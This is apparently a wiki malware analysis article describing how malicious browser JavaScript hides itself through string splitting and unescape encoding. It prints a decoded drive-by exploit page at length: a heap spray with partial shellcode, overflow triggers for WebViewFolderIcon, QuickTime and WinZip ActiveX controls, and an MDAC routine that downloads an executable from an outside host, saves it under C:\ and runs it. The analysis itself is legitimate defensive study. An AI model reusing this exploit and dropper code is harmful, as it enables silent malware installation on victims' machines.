Obfuscation methods in malicious Java scripts
From Total Malware Info
Author: Alexander Adamov, Virus Analyst.
Trying to exploit Internet Browser vulnerabilities hackers makes an effort in hiding malicious code by means of different kind of obfuscation to avoid simple signatures. The resulting script is used to download other malware onto the system.
For the purpose of masking the dangerous intents following methods are used:
- HTML encryption tools
- strings splitting
- advanced protectors
As for the first one, the various encryption tools are widely available in Web (e.g. http://www.iwebtool.com/html_encrypter):
The example of string splitting is shown below (Exploit.HTML.IESlice.p -- detected by Kaspersky Anti-Virus):
kyjkidk = "G"+p+"E"+p+"T";
var neuh = "http://masiv.info/index.php?a=3&c=3";
txnrlaa = "X"+p+"MLHTT"+p+"P";
var byzqpd = anwnuo.CreateObject("Scripting."+p+"File"+p+"SystemObject", "")
xkb = "She"+p+"ll";
sdk = "AD"+p+"O"+p+"DB";
xlnpl = "kfhnbue"+".exe";
wxjxlg = ".";
drogq = "G"+p+"ET";
fzsadl = "A"+p+"pp"+p+"l"+p+"ica"+p+"t"+p+"i"+p+"o"+p+"n";
ioqdw = ".";
fvmdf = "S"+p+"tre"+p+"a"+p+"m";
bhardg = "MSX"+p+"ML2";
var lldwnqj = izthzbn(anwnuo, xkb+wxjxlg+fzsadl);
wsuvvey = "M"+p+"ic"+p+"ro"+p+"s"+p+"oft";
cxawh = 7+6+1+1+3+6+2+1;
nvueig = "G"+p+"ET";
ujzsd = "X"+p+"ML"+p+"HTTP";
var ulgaiur = izthzbn(anwnuo, sdk+ioqdw+fvmdf);
evu = "MSXML"+p+"2";
But most interesting case is when the code is obfuscated by special encrypting procedures. Let us consider the code of Exploit.HTML.IESlice.h (detected by Kaspersky Anti-Virus):
document.write( unescape('%3C%73%63%72%69%70%74%3E
%0D%0A%66%75%6E%63%74%69%6F%6E%20%7A%58%28
%73%29%0D%0A%7B%0D%0A%76%61%72%20%73%31%3D
%75%6E%65%73%63%61%70%65%28%20%73%2E%73%75
%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74
%68%2D%31%29%29%3B%20%0D%0A%76%61%72%20%74
%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C
%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29
%20%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F
%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63
%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73
%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67
%74%68%2D%31%2C%31%29%29%3B%20%0D%0A%64%6F
%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75
%6E%65%73%63%61%70%65%28%74%29%29%3B%20%7D
%0D%0A%3C%2F%73%63%72%69%70%74%3E'));
zX('%2A8Hxhwnuy%2A75qfslzflj%2A8IOf%7BfXhwnuy%2A8Jkzshynts
%2A75ih%2A7%3D%7D%2A7%3E%2A%3CG%7Bfw%2A75q%2A8I…');
Here we can see unescape('%3C%73%63%72%69…') the contents of zX function, which performs the decoding procedure. After it the corresponding call is following in order to extract the real script content:
<html>
<head>
<title></title>
<script language="JavaScript">
var memory = new Array();
var mem_flag = 0;
function having() { memory=memory; setTimeout("having()", 2000); }
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{spraySlide += spraySlide;}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
function makeSlide()
{
var heapSprayToAddress = 0x0c0c0c0c;
var payLoadCode = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" +
"%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb" + "...");
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u0c0c%u0c0c");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
mem_flag = 1;
having();
return memory;
}
function startWVF()
{
for (i=0;i<128;i++)
{
try{
var tar = new ActiveXObject('WebVi'+'ewFol'+'derIc'+'on.WebVi'+'ewFol'+'derI'+'con.1');
d = 0x7ffffffe;
b = 0x0c0c0c0c
tar.setSlice(d, b, b, b );
}catch(e){}
}
}
function startWinZip(object)
{
var xh = 'A';
while (xh.length < 231) xh+='A';
xh+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c";
object.CreateNewFolderFromName(xh);
}
function startOverflow(num)
{
if (num == 0) {
try {
var qt = new ActiveXObject('QuickTime.QuickTime');
if (qt) {
var qthtml = '<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="1" height="1" style="border:0px">'+
'<param name="src" value="qt.php">'+
'<param name="autoplay" value="true">'+
'<param name="loop" value="false">'+
'<param name="controller" value="true">'+
'</object>';
if (! mem_flag) makeSlide();
document.getElementById('mydiv').innerHTML = qthtml;
num = 255;
}
} catch(e) { }
if (num = 255) setTimeout("startOverflow(1)", 2000);
else startOverflow(1);
} else if (num == 1) {
try {
var winzip = document.createElement("object");
winzip.setAttribute("classid", "clsid:A09AE68F-B14D-43ED-B713-BA413F034904");
var ret=winzip.CreateNewFolderFromName(unescape("%00"));
if (ret == false) {
if (! mem_flag) makeSlide();
startWinZip(winzip);
num = 255;
}
} catch(e) { }
if (num = 255) setTimeout("startOverflow(2)", 2000);
else startOverflow(2);
} else if (num == 2) {
try {
var tar = new ActiveXObject('WebVi'+'ewFol'+'derIc'+'on.WebVi'+'ewFol'+'derI'+'con.1');
if (tar) {
if (! mem_flag) makeSlide();
startWVF();
}
} catch(e) { }
}
}
function GetRandString(len)
{
var chars = "abcdefghiklmnopqrstuvwxyz";
var string_length = len;
var randomstring = '';
for (var i=0; i<string_length; i++) {
var rnum = Math.floor(Math.random() * chars.length);
randomstring += chars.substring(rnum,rnum+1);
}
return randomstring;
}
function CreateObject(CLSID, name) {
var r = null;
try { eval('r = CLSID.CreateObject(name)') }catch(e){}
if (! r) { try { eval('r = CLSID.CreateObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject("", name)') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name, "")') }catch(e){} }
if (! r) { try { eval('r = CLSID.GetObject(name)') }catch(e){} }
return(r);
}
function XMLHttpDownload(xml, url) {
try {
xml.open("GET", url, false);
xml.send(null);
} catch(e) { return 0; }
return xml.responseBody;
}
function ADOBDStreamSave(o, name, data) {
try {
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(data);
o.SaveToFile(name, 2);
o.Close();
} catch(e) { return 0; }
return 1;
}
function ShellExecute(exec, name, type) {
if (type == 0) {
try { exec.Run(name, 0); return 1; } catch(e) { }
} else {
try { exe.ShellExecute(name); return 1; } catch(e) { }
}
return(0);
}
function MDAC() {
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}',
'{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
'{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}',
'{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}',
'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}',
'{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}',
'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe = 'http://listcom.org/forum/file.php';
while (t[i] && (! v[0] || ! v[1] || ! v[2]) ) {
var a = null;
try {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} catch(e) { a = null; }
if (a) {
if (! v[0]) {
v[0] = CreateObject(a, "msxml2.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "Microsoft.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "MSXML2.ServerXMLHTTP");
}
if (! v[1]) {
v[1] = CreateObject(a, "ADODB.Stream");
}
if (! v[2]) {
v[2] = CreateObject(a, "WScript.Shell");
if (! v[2]) {
v[2] = CreateObject(a, "Shell.Application");
if (v[2]) n=1;
}
}
}
i++;
}
if (v[0] && v[1] && v[2]) {
var data = XMLHttpDownload(v[0], urlRealExe);
if (data != 0) {
var name = "c:\\sys"+GetRandString(4)+".exe";
if (ADOBDStreamSave(v[1], name, data) == 1) {
if (ShellExecute(v[2], name, n) == 1) {
ret=1;
}
}
}
}
return ret;
}
function start() {
if (! MDAC() ) { startOverflow(0); }
}
</script>
</head>
<body onload="start()">
<div id="mydiv"></div>
</body>
</html>
This script exploits one of the following vulnerabilities to initiate the buffer overflow:
- Buffer Overflow in setSlice() method of WebViewFolderIcon ActiveX Object (MS06-57)
- Integer overflow in Apple QuickTime (CVE-2004-0431)
- WinZip FileView ActiveX controls CreateNewFolderFromName() Method Buffer Overflow (MS06-067)
Preliminary the script is spraying in the memory shellcode with the file downloading functionality given in Unicode format:
“%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa %ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb...”
To prove the malicious intent of the shellcode it is necessary to represent it in binary view. For that purposes following actions have to be performed:
- Eliminate %u chars
- Swap the high and low bytes in Unicode word
- Transform from ASCII to HEX view
- Store results in Binary file
Let us take a look to the binary code in disassembler:
Obviously the code is encrypted with XOR. To decode it is needed to make XOR operation with 0EFh value under each byte from the address :00000015.
And now it is possible to say that this code downloads following link with the help of URLMON.DLL function calls: http://***.org/forum/file.php (at the moment of writing, this link was not working).
To sum up, despite the numerous variety of malicious code it is possible to cope with the growing rate of hacker’s attacks throw the existed vulnerabilities in installed software by using Anti-Virus Solutions with Web stream checking feature and disabling dangerous content execution in Internet Browser.
